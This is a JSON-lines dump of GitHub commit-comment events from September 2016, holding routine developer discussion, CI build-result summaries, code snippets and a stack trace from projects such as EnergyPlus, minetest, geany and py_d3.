{"id":"4593631067","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107130,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-21T02:07:55Z","updated_at":"2016-09-21T02:07:55Z","body":"ASIHP-validation1 (shenb) - Win64-Windows-7-VisualStudio-12: OK (2338 of 2339 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T02:07:55Z"}
{"id":"4593632411","type":"CommitCommentEvent","actor":{"login":"renatonascalves"},"repo":{"name":"nfe/woo-nfe"},"payload":{"comment":{"id":19107133,"position":null,"line":null,"path":null,"commit_id":"24d3d1a02142de076f5d64a067ff5512339d493e","created_at":"2016-09-21T02:08:21Z","updated_at":"2016-09-21T02:08:21Z","body":"Your IDE is doing something to the code that it removes and messes with the tabs..."}},"created_at":"2016-09-21T02:08:21Z"}
{"id":"4593633959","type":"CommitCommentEvent","actor":{"login":"dgoon"},"repo":{"name":"hyperconnect/AFAmazonS3Manager"},"payload":{"comment":{"id":19107136,"position":21,"line":302,"path":"AFAmazonS3Manager/AFAmazonS3Manager.m","commit_id":"db8614af63a782bc290ac06c385f4edc6f8c638f","created_at":"2016-09-21T02:08:55Z","updated_at":"2016-09-21T02:08:55Z","body":"이거 동기로 처리되는거죠?"}},"created_at":"2016-09-21T02:08:55Z"}
{"id":"4593636905","type":"CommitCommentEvent","actor":{"login":"anujg1991"},"repo":{"name":"anujg1991/stringMLST"},"payload":{"comment":{"id":19107140,"position":null,"line":null,"path":null,"commit_id":"7f59f0c4282f272cb4855464b37958b8079bf286","created_at":"2016-09-21T02:10:01Z","updated_at":"2016-09-21T02:10:01Z","body":"Will fix #1"}},"created_at":"2016-09-21T02:10:01Z"}
{"id":"4593639361","type":"CommitCommentEvent","actor":{"login":"cheapie"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107146,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T02:10:48Z","updated_at":"2016-09-21T02:10:48Z","body":"I've been told that 15 is the brightness of sunlight. Is there a reason this can't be used by mods?"}},"created_at":"2016-09-21T02:10:48Z"}
{"id":"4593639405","type":"CommitCommentEvent","actor":{"login":"akre54"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107147,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T02:10:49Z","updated_at":"2016-09-21T02:10:49Z","body":"Right right. I'm referring to the stuff below (the script block starting with `_select = d3.select`)\r\n\r\n`window.d3` should be fine for most purposes since d3 should be loaded by that time."}},"created_at":"2016-09-21T02:10:49Z"}
{"id":"4593644029","type":"CommitCommentEvent","actor":{"login":"cheapie"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107152,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T02:12:24Z","updated_at":"2016-09-21T02:12:24Z","body":"I haven't seen any lighting issues before from mods using a light_source of 15 (or the completely-invalid 30, like blox did for some reason). Is there an issue report here somewhere for it?"}},"created_at":"2016-09-21T02:12:24Z"}
{"id":"4593658709","type":"CommitCommentEvent","actor":{"login":"ResidentMario"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107182,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T02:17:41Z","updated_at":"2016-09-21T02:17:41Z","body":"I don't see the harm in making the change, but I'm unsure that that would fix the issue---as in, I don't see what difference it would make (between using the `d3` local context in the callback and the `d3` global outside of it).\r\n\r\nAre you sure that your import error stems from the block being outside of the callback?"}},"created_at":"2016-09-21T02:17:41Z"}
{"id":"4593660494","type":"CommitCommentEvent","actor":{"login":"masonelmore"},"repo":{"name":"ShivonQ/Solo-Unittest-Dice-Poker"},"payload":{"comment":{"id":19107186,"position":4,"line":31,"path":"displays.py","commit_id":"108cab1a22cf090b233fca748ea5cb8d03ec2548","created_at":"2016-09-21T02:18:20Z","updated_at":"2016-09-21T02:18:20Z","body":"`win_dex` beautiful variable name! :+1: "}},"created_at":"2016-09-21T02:18:20Z"}
{"id":"4593663818","type":"CommitCommentEvent","actor":{"login":"renatonascalves"},"repo":{"name":"nfe/woo-nfe"},"payload":{"comment":{"id":19107191,"position":5,"line":10,"path":"lib/client-php/lib/NFe/APIResource.php","commit_id":"21eb7ff87133d09f6b2ea33ce5dbb0f9f259a75c","created_at":"2016-09-21T02:19:36Z","updated_at":"2016-09-21T02:19:36Z","body":"@gblmarquez This should be changed in the client-php repository, not in the nfe-woo one."}},"created_at":"2016-09-21T02:19:36Z"}
{"id":"4593663934","type":"CommitCommentEvent","actor":{"login":"ShivonQ"},"repo":{"name":"ShivonQ/Solo-Unittest-Dice-Poker"},"payload":{"comment":{"id":19107192,"position":4,"line":31,"path":"displays.py","commit_id":"108cab1a22cf090b233fca748ea5cb8d03ec2548","created_at":"2016-09-21T02:19:38Z","updated_at":"2016-09-21T02:19:38Z","body":"Lol, thx I thought so too.\n\nOn Tue, Sep 20, 2016, 21:18 Mason Elmore <notifications@github.com> wrote:\n\n> win_dex beautiful variable name! 👍\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ShivonQ/Solo-Unittest-Dice-Poker/commit/108cab1a22cf090b233fca748ea5cb8d03ec2548#commitcomment-19107186>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJbeauGkg0NxL67KM25_U4nZMd0ReMgeks5qsJPsgaJpZM4KCVTb>\n> .\n>\n"}},"created_at":"2016-09-21T02:19:38Z"}
{"id":"4593665221","type":"CommitCommentEvent","actor":{"login":"renatonascalves"},"repo":{"name":"nfe/woo-nfe"},"payload":{"comment":{"id":19107193,"position":null,"line":null,"path":null,"commit_id":"21eb7ff87133d09f6b2ea33ce5dbb0f9f259a75c","created_at":"2016-09-21T02:20:05Z","updated_at":"2016-09-21T02:20:05Z","body":"Actually, all updates in this commit was made in the wrong place. :/"}},"created_at":"2016-09-21T02:20:05Z"}
{"id":"4593673835","type":"CommitCommentEvent","actor":{"login":"lotosbin"},"repo":{"name":"xyting/RigoFunc.Account"},"payload":{"comment":{"id":19107213,"position":null,"line":null,"path":null,"commit_id":"7314032574997f4146c5ec21700b347574e9958a","created_at":"2016-09-21T02:23:13Z","updated_at":"2016-09-21T02:23:13Z","body":"@xyting use ValidateAttribute or FluentValidate will better?"}},"created_at":"2016-09-21T02:23:13Z"}
{"id":"4593675702","type":"CommitCommentEvent","actor":{"login":"akre54"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107218,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T02:23:55Z","updated_at":"2016-09-21T02:23:55Z","body":"The cell code seems to run without it (minus the first-run hiccup), but my point is that your code below (lines 66 - 75) isn't getting run because `<script>` tags are synchronous. \r\n\r\nd3 isn't on the page by the time the script block gets executed. Previously when you loaded d3 through a script tag the browser blocked before running the rest of the page. Now that you're loading d3 though AMD that code block won't work."}},"created_at":"2016-09-21T02:23:55Z"}
{"id":"4593678633","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"CyanogenMod/android_device_motorola_msm8226-common"},"payload":{"comment":{"id":19107230,"position":null,"line":null,"path":null,"commit_id":"9886760007f5fd9a67916a115833b6f4b60068c1","created_at":"2016-09-21T02:25:02Z","updated_at":"2016-09-21T02:25:02Z","body":"https://m.facebook.com/story.php?story_fbid=1770743423202915&id=100008018230989"}},"created_at":"2016-09-21T02:25:02Z"}
{"id":"4593679385","type":"CommitCommentEvent","actor":{"login":"superlack"},"repo":{"name":"frappe/erpnext"},"payload":{"comment":{"id":19107233,"position":null,"line":null,"path":null,"commit_id":"a6927e05ba840e6f9f51eed601e978b9bca15921","created_at":"2016-09-21T02:25:19Z","updated_at":"2016-09-21T02:25:19Z","body":"This is a great idea; makes billing a lot easier!!"}},"created_at":"2016-09-21T02:25:19Z"}
{"id":"4593683035","type":"CommitCommentEvent","actor":{"login":"dandoyon"},"repo":{"name":"meteor/simple-todos-angular"},"payload":{"comment":{"id":19107243,"position":null,"line":null,"path":null,"commit_id":"0676ae95b052efd2e2795b12bcf9e67c7a5d99be","created_at":"2016-09-21T02:26:40Z","updated_at":"2016-09-21T02:26:40Z","body":"Would love to have this working. Seems like there needs to be a mock window object for angular\r\n\r\n`20160920-19:24:29.338(-7)? (STDERR) ReferenceError: window is not defined\r\nW20160920-19:24:29.338(-7)? (STDERR)     at meteorInstall.node_modules.angular-mocks.angular-mocks.js (node_modules/angular-mocks/angular-mocks.js:3126:1)\r\nW20160920-19:24:29.338(-7)? (STDERR)     at fileEvaluate (packages/modules-runtime/.npm/package/node_modules/install/install.js:153:1)\r\nW20160920-19:24:29.338(-7)? (STDERR)     at Module.require (packages/modules-runtime/.npm/package/node_modules/install/install.js:82:1)\r\nW20160920-19:24:29.338(-7)? (STDERR)     at Module.Mp.import (/Users/ddoyon/.meteor/packages/modules/.0.7.6.1rr9fy6++os+web.browser+web.cordova/npm/node_modules/reify/lib/runtime.js:70:16)\r\nW20160920-19:24:29.338(-7)? (STDERR)     at meteorInstall.imports.components.todosList.todosList.tests.js (/private/var/folders/ys/6q664rj90zd0h_mvfh6kq2kc0000gp/T/meteor-test-runymw7hs/.meteor/local/build/programs/server/app/app.js:9:14)\r\nW20160920-19:24:29.339(-7)? (STDERR)     at fileEvaluate (packages/modules-runtime/.npm/package/node_modules/install/install.js:153:1)\r\nW20160920-19:24:29.339(-7)? (STDERR)     at require (packages/modules-runtime/.npm/package/node_modules/install/install.js:82:1)\r\nW20160920-19:24:29.339(-7)? (STDERR)     at /private/var/folders/ys/6q664rj90zd0h_mvfh6kq2kc0000gp/T/meteor-test-runymw7hs/.meteor/local/build/programs/server/app/app.js:189:1\r\nW20160920-19:24:29.339(-7)? (STDERR)     at /private/var/folders/ys/6q664rj90zd0h_mvfh6kq2kc0000gp/T/meteor-test-runymw7hs/.meteor/local/build/programs/server/boot.js:292:10\r\nW20160920-19:24:29.340(-7)? (STDERR)     at Array.forEach (native)\r\n=> Exited with code: 1\r\nW20160920-19:24:34.185(-7)? (STDERR) /Users/ddoyon/.meteor/packages/meteor-tool/.1.4.1_1.1h0re2h++os.osx.x86_64+web.browser+web.cordova/mt-os.osx.x86_64/dev_bundle/server-lib/node_modules/fibers/future.js:280`"}},"created_at":"2016-09-21T02:26:40Z"}
{"id":"4593683814","type":"CommitCommentEvent","actor":{"login":"VanessaE"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107246,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T02:26:58Z","updated_at":"2016-09-21T02:26:58Z","body":"\"we're busy\", says the guy whose committed code broke a bunch of mods.  Seriously?"}},"created_at":"2016-09-21T02:26:58Z"}
{"id":"4593686671","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19107252,"position":null,"line":null,"path":null,"commit_id":"37550da93cd62fc5200dd88719e09bf9c121aa2e","created_at":"2016-09-21T02:28:04Z","updated_at":"2016-09-21T02:28:04Z","body":"Why you did this change?"}},"created_at":"2016-09-21T02:28:04Z"}
{"id":"4593688506","type":"CommitCommentEvent","actor":{"login":"dvusboy"},"repo":{"name":"nuxeo/docker-nuxeo"},"payload":{"comment":{"id":19107260,"position":null,"line":null,"path":null,"commit_id":"b37540c919e58c027f7a2f5211ad12f667f1bb76","created_at":"2016-09-21T02:28:44Z","updated_at":"2016-09-21T02:28:44Z","body":"So, 8.3 doesn't need this any more?"}},"created_at":"2016-09-21T02:28:44Z"}
{"id":"4593689526","type":"CommitCommentEvent","actor":{"login":"freezxin"},"repo":{"name":"freezxin/GitTest"},"payload":{"comment":{"id":19107267,"position":null,"line":null,"path":null,"commit_id":"50d8d32031f2cdaf799df44bf65241865544f997","created_at":"2016-09-21T02:29:08Z","updated_at":"2016-09-21T02:29:08Z","body":"为什么在客户端无法编辑使用，再看看"}},"created_at":"2016-09-21T02:29:08Z"}
{"id":"4593691562","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107269,"position":null,"line":null,"path":null,"commit_id":"2c91037d2958844ef27f7d1d75372286399e7589","created_at":"2016-09-21T02:29:53Z","updated_at":"2016-09-21T02:29:53Z","body":"This sends many, many notifications. The downgrade timer may drop a few ticks from time to time when creeps are still hauling energy to it. Also it will send a warning at 9999, 9998, 9997, etc. Luckily I [specified](http://support.screeps.com/hc/en-us/articles/203016382-Game#notify) that these notifications should send as a batch every 15 minutes."}},"created_at":"2016-09-21T02:29:53Z"}
{"id":"4593692688","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaData/DataStreams.jl"},"payload":{"comment":{"id":19107271,"position":63,"line":73,"path":"docs/src/index.md","commit_id":"359240329728cdf7d784a78316f8c409ab97a614","created_at":"2016-09-21T02:30:17Z","updated_at":"2016-09-21T02:30:17Z","body":"We're still pre-0.1 and every release has minor breaking changes. That's part of why I wanted to ping the people I know are actually starting to use the code here. I think it's almost done with breaking changes though, so I think we're just about ready for 0.1."}},"created_at":"2016-09-21T02:30:17Z"}
{"id":"4593694096","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19107275,"position":55,"line":364,"path":"doc/plugins.dox","commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T02:30:47Z","updated_at":"2016-09-21T02:30:47Z","body":"It just occurred to me while tinkering with this, if the `pdata` argument had come first, then one could use member functions directly in the `GeanyPluginFuncs` setup without the need for separate C wrapper boilerplate. It would probably require typedefs for the function pointer types to facilitate type casts. A basic wrapper plugin over a GObject could've looked like this:\r\n\r\n```vala\r\n// some gobject in vala, to save typing\r\nnamespace Foo {\r\n  public class Plugin {\r\n    bool init(Geany.Plugin p) { return true; }\r\n    void cleanup(Geany.Plugin p) {}\r\n  }\r\n}\r\n```\r\n\r\n```c\r\n// the actual plugin implementation\r\nG_MODULE_EXPORT void\r\ngeany_load_module (GeanyPlugin *p)\r\n{\r\n  p->info->name = \"Foo\";\r\n  ...\r\n  p->funcs->init = (GeanyInitFunc) foo_plugin_init;\r\n  p->funcs->cleanup = (GeanyCleanupFunc) foo_plugin_cleanup;\r\n  ...\r\n  GEANY_PLUGIN_REGISTER_FULL (p, 42, foo_plugin_new, g_object_unref);\r\n}\r\n```\r\n\r\nI don't know if it can be changed now or some alternative funcs with swapped arguments added, I just thought I'd mention it as I just coded 4 hook functions to do nothing but reverse the arguments to call another C function."}},"created_at":"2016-09-21T02:30:47Z"}
{"id":"4593695629","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107278,"position":15,"line":38,"path":"main.js","commit_id":"2c91037d2958844ef27f7d1d75372286399e7589","created_at":"2016-09-21T02:31:22Z","updated_at":"2016-09-21T02:31:22Z","body":"I was at RCL 2 and expecting an upgrade to RCL 3 while I was sleeping. The downgrade timer starts at 10k at level 3, up from 5k at level 2."}},"created_at":"2016-09-21T02:31:22Z"}
{"id":"4593698056","type":"CommitCommentEvent","actor":{"login":"ramanjine"},"repo":{"name":"pavankumar041/sigmalabs5"},"payload":{"comment":{"id":19107281,"position":null,"line":null,"path":null,"commit_id":"2adaac1de4d3d56fd5b305a3979a917fe2131d78","created_at":"2016-09-21T02:32:14Z","updated_at":"2016-09-21T02:32:14Z","body":"merge from master to my repository"}},"created_at":"2016-09-21T02:32:14Z"}
{"id":"4593699971","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107289,"position":null,"line":null,"path":null,"commit_id":"a093c7571cf9c690b2995edd48e90640102ba062","created_at":"2016-09-21T02:33:01Z","updated_at":"2016-09-21T02:33:01Z","body":"I was getting an email every 15 minutes with a lot of notifications, now it should only send one each time the downgrade timer drops below the threshold."}},"created_at":"2016-09-21T02:33:01Z"}
{"id":"4593701475","type":"CommitCommentEvent","actor":{"login":"chadkazulu"},"repo":{"name":"chadkazulu/Sprout"},"payload":{"comment":{"id":19107303,"position":null,"line":null,"path":null,"commit_id":"ff629f06dbdf3c356c741c5a027bd448a8501743","created_at":"2016-09-21T02:33:37Z","updated_at":"2016-09-21T02:33:37Z","body":"Never use this script\r\n"}},"created_at":"2016-09-21T02:33:37Z"}
{"id":"4593702920","type":"CommitCommentEvent","actor":{"login":"yaroslavvb"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19107304,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T02:34:10Z","updated_at":"2016-09-21T02:34:10Z","body":"Is there any way to override this heuristic when doing manual placement? IE, I got counter-intuitive results in [this issue](https://github.com/tensorflow/tensorflow/issues/4498#issuecomment-248483967) where a constant node got placed on worker1 even though it was inside \"with tf.device(worker2):\" block"}},"created_at":"2016-09-21T02:34:10Z"}
{"id":"4593706070","type":"CommitCommentEvent","actor":{"login":"kenichirofukuda"},"repo":{"name":"kenichirofukuda/aws-exercise"},"payload":{"comment":{"id":19107311,"position":5,"line":5,"path":"routes/index.js","commit_id":"3d5394c0c221bfcaf34ec534463129e045a541d2","created_at":"2016-09-21T02:35:29Z","updated_at":"2016-09-21T02:35:29Z","body":"ご指摘ありがとうございます。分かっていたんですが手を抜いてしまいました。。。\r\nCFで変数渡し出来る様にするとご指摘の通りポータビリティが良くなると思います。"}},"created_at":"2016-09-21T02:35:29Z"}
{"id":"4593708238","type":"CommitCommentEvent","actor":{"login":"PETEAM-THEAIO"},"repo":{"name":"PETEAM-THEAIO/testmatrix_config"},"payload":{"comment":{"id":19107319,"position":null,"line":null,"path":null,"commit_id":"ff07509d0c336b7289c1527e7534667ad488ec4f","created_at":"2016-09-21T02:36:18Z","updated_at":"2016-09-21T02:36:18Z","body":"ROM code detection added (by checking CID) "}},"created_at":"2016-09-21T02:36:18Z"}
{"id":"4593710067","type":"CommitCommentEvent","actor":{"login":"starshineSong"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19107322,"position":null,"line":null,"path":null,"commit_id":"a5c38a9c087e33d36397afc496be7c8e01b37ef0","created_at":"2016-09-21T02:36:59Z","updated_at":"2016-09-21T02:36:59Z","body":"Can I use in \"<a  href=\"\"  data-disable-with='wait...'>click me</a>\"?"}},"created_at":"2016-09-21T02:36:59Z"}
{"id":"4593712506","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107330,"position":16,"line":41,"path":"main.js","commit_id":"a093c7571cf9c690b2995edd48e90640102ba062","created_at":"2016-09-21T02:37:53Z","updated_at":"2016-09-21T02:37:53Z","body":"groupInterval parameter omitted, should be sent immediately? My account send interval is set to 5 minutes, that may affect this."}},"created_at":"2016-09-21T02:37:53Z"}
{"id":"4593713689","type":"CommitCommentEvent","actor":{"login":"ResidentMario"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107333,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T02:38:20Z","updated_at":"2016-09-21T02:38:20Z","body":"I unthinkingly just copy-pasted the code over, forgetting that I need to export the selection global as well. Had to roll it back. Measure twice, cut once.\r\n\r\nHave to do something else right now. Will try to get back to this soon, but maybe you'd to pull request it yourself?"}},"created_at":"2016-09-21T02:38:20Z"}
{"id":"4593714466","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107335,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T02:38:36Z","updated_at":"2016-09-21T02:38:36Z","body":"See https://github.com/minetest/minetest/issues/3964#issuecomment-246115736\r\nWhen removing the node infinitely propagating light is created, i don't yet know of a way to fix it, maybe a mod using a voxelmanip to reset lighting.\r\n\r\n> whose committed code broke a bunch of mods\r\n\r\nWhat code broke what mods? We solved a widespread and serious bug and added notification to avoid it, there are many other situations where node definition errors will halt the game, it's not unusual.\r\nWe are indeed busy and a simple PR could be done by a contributor."}},"created_at":"2016-09-21T02:38:36Z"}
{"id":"4593715662","type":"CommitCommentEvent","actor":{"login":"djpnewton"},"repo":{"name":"bramcohen/NotValidAfter"},"payload":{"comment":{"id":19107339,"position":null,"line":null,"path":null,"commit_id":"992301c1fcde4251f535884d17ef6c36beb64642","created_at":"2016-09-21T02:39:03Z","updated_at":"2016-09-21T02:39:03Z","body":"N_LOCKTIMEVERIFY refers to the nLockTime field right?\r\n\r\nHow would this be a soft fork? Adding a new field to transactions would be a hard fork. Adding a new script opcode could work but isn't the pubkey script generally only checked when spending an input not when checking if a transaction is valid in other terms."}},"created_at":"2016-09-21T02:39:03Z"}
{"id":"4593717295","type":"CommitCommentEvent","actor":{"login":"starshineSong"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19107345,"position":null,"line":null,"path":null,"commit_id":"a5c38a9c087e33d36397afc496be7c8e01b37ef0","created_at":"2016-09-21T02:39:39Z","updated_at":"2016-09-21T02:39:39Z","body":"Can I use in prevent repeat click in the link?"}},"created_at":"2016-09-21T02:39:39Z"}
{"id":"4593720429","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107353,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T02:40:49Z","updated_at":"2016-09-21T02:40:49Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T02:40:49Z"}
{"id":"4593720505","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19107354,"position":55,"line":364,"path":"doc/plugins.dox","commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T02:40:51Z","updated_at":"2016-09-21T02:40:51Z","body":"I should mention for the specific case of Vala, I think you can write something like this:\r\n\r\n```vala\r\n// some gobject in vala, to save typing\r\nnamespace Foo {\r\n  public class Plugin : Object {\r\n    [CCode(instance_pos=1.1)]\r\n    bool init(Geany.Plugin p) { return true; }\r\n    [CCode(instance_pos=1.1)]\r\n    void cleanup(Geany.Plugin p) {}\r\n  }\r\n}\r\n```\r\n\r\nIt might work directly in this case."}},"created_at":"2016-09-21T02:40:51Z"}
{"id":"4593720765","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19107356,"position":671,"line":671,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T02:40:57Z","updated_at":"2016-09-21T02:40:57Z","body":"そうですね。\r\nvni は使って無いので、下記のように修正しました。\r\n`for network in self.networks.values():`\r\n\r\n`_` で消しこむよりは、「最初から取らない」というようなイメージです。"}},"created_at":"2016-09-21T02:40:57Z"}
{"id":"4593722658","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107359,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T02:41:40Z","updated_at":"2016-09-21T02:41:40Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T02:41:40Z"}
{"id":"4593723989","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107361,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T02:42:08Z","updated_at":"2016-09-21T02:42:08Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2373 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T02:42:08Z"}
{"id":"4593727059","type":"CommitCommentEvent","actor":{"login":"sustrik"},"repo":{"name":"sustrik/libdill"},"payload":{"comment":{"id":19107365,"position":null,"line":null,"path":null,"commit_id":"3fdded2a52a2f48101a03d573e3908a45782ae77","created_at":"2016-09-21T02:43:18Z","updated_at":"2016-09-21T02:43:18Z","body":"Fixed."}},"created_at":"2016-09-21T02:43:18Z"}
{"id":"4593729211","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19107368,"position":null,"line":null,"path":null,"commit_id":"95899220f36a45f1f8a1fbddfc7fc0cfe107602d","created_at":"2016-09-21T02:44:08Z","updated_at":"2016-09-21T02:44:08Z","body":"Keeps updating when not in foreground on mobile."}},"created_at":"2016-09-21T02:44:08Z"}
{"id":"4593729601","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19107369,"position":null,"line":null,"path":null,"commit_id":"c97365c44af45804a97f20b8c3f914c5e6048fe8","created_at":"2016-09-21T02:44:17Z","updated_at":"2016-09-21T02:44:17Z","body":"Lisa gives 18k EXP, not 180k"}},"created_at":"2016-09-21T02:44:17Z"}
{"id":"4593730073","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19107370,"position":null,"line":null,"path":null,"commit_id":"c97365c44af45804a97f20b8c3f914c5e6048fe8","created_at":"2016-09-21T02:44:28Z","updated_at":"2016-09-21T02:44:28Z","body":"http://tibia.wikia.com/wiki/Lisa"}},"created_at":"2016-09-21T02:44:28Z"}
{"id":"4593731132","type":"CommitCommentEvent","actor":{"login":"VanessaE"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107374,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T02:44:52Z","updated_at":"2016-09-21T02:44:52Z","body":"If a mod works before the commit, and fails after, and nothing functional about the mod has actually changed, then by definition the engine broke the mod.  If there are \"hundreds\" of bad uses of lighting values existed, then that alone was sufficient reason not to throw an error."}},"created_at":"2016-09-21T02:44:52Z"}
